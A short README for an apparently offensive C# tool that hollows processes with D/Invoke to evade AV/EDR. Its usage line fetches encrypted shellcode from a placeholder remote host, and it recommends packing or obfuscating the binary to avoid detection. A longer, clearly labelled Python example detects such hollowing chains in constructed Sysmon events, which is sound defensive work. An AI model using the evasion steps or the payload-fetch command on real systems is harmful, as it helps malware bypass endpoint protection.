
Process Hollowing using standalone D/Invoke and remote encrypted shellcode

Primary Language: C#

Hollow

An attempt to evade AV/EDR products by using process hollowing with standalone dynamic invocation (D/Invoke), which avoids suspicious imports and API hooks, and by loading remote AES- or XOR-encrypted shellcode.

Usage

Example:

.\H0ll0w.exe -u http://IP:PORT/shellcode.bin -e AES -k "KEY"

To further evade detection, it is recommended to pack the executable with PEzor or scramble and obfuscate it with ConfuserEx.
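Seen from the defensive side, the behaviour described above (a remote payload fetch followed by hollowing of a newly created process) leaves a trail that can be correlated in endpoint telemetry. The following is an added example, not part of this repository: it assumes Sysmon-style events (IDs 1, 3 and 25) already parsed into dictionaries, and every event, GUID and path in it is constructed.

```python
# Added detection example (not from the repository). All events are constructed.
# Field names follow Sysmon: EventID 1 = process creation,
# 3 = network connection, 25 = process tampering.
EVENTS = [
    # A loader makes an outbound connection, spawns a child, child image is replaced.
    {"EventID": 3, "ProcessGuid": "{A1}", "Initiated": True,
     "Image": r"C:\Users\bob\Downloads\loader.exe", "DestinationPort": 8080},
    {"EventID": 1, "ProcessGuid": "{B2}", "ParentProcessGuid": "{A1}",
     "Image": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 25, "ProcessGuid": "{B2}", "Type": "Image is replaced",
     "Image": r"C:\Windows\System32\svchost.exe"},
    # A browser with network activity and a child process, but no tampering event.
    {"EventID": 3, "ProcessGuid": "{C3}", "Initiated": True,
     "Image": r"C:\Program Files\Browser\browser.exe", "DestinationPort": 443},
    {"EventID": 1, "ProcessGuid": "{D4}", "ParentProcessGuid": "{C3}",
     "Image": r"C:\Program Files\Browser\browser.exe"},
    # A tampering event whose parent never initiated a connection.
    {"EventID": 1, "ProcessGuid": "{F6}", "ParentProcessGuid": "{E5}",
     "Image": r"C:\Windows\System32\notepad.exe"},
    {"EventID": 25, "ProcessGuid": "{F6}", "Type": "Image is replaced",
     "Image": r"C:\Windows\System32\notepad.exe"},
]


def find_hollowing_chains(events):
    """Flag children whose image was replaced and whose parent initiated
    an outbound connection (fetch -> spawn -> replace-image chain)."""
    # Processes that initiated at least one outbound connection.
    net = {e["ProcessGuid"]: e["Image"] for e in events
           if e["EventID"] == 3 and e.get("Initiated")}
    # Process-creation records, keyed by the new process's GUID.
    spawned = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    hits = []
    for e in events:
        if e["EventID"] != 25 or e.get("Type") != "Image is replaced":
            continue
        child = spawned.get(e["ProcessGuid"])
        if child and child["ParentProcessGuid"] in net:
            hits.append({"parent": net[child["ParentProcessGuid"]],
                         "child": child["Image"],
                         "child_guid": e["ProcessGuid"]})
    return hits


if __name__ == "__main__":
    for hit in find_hollowing_chains(EVENTS):
        print("possible hollowing:", hit["parent"], "->", hit["child"])
```

The correlation is keyed on ProcessGuid rather than on event order, so it does not depend on the network event being logged before the process-creation event.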

Refs

Disclaimer

This repository is for educational purposes only and should not be used for malicious purposes. The author is not responsible for any illegal use of the code.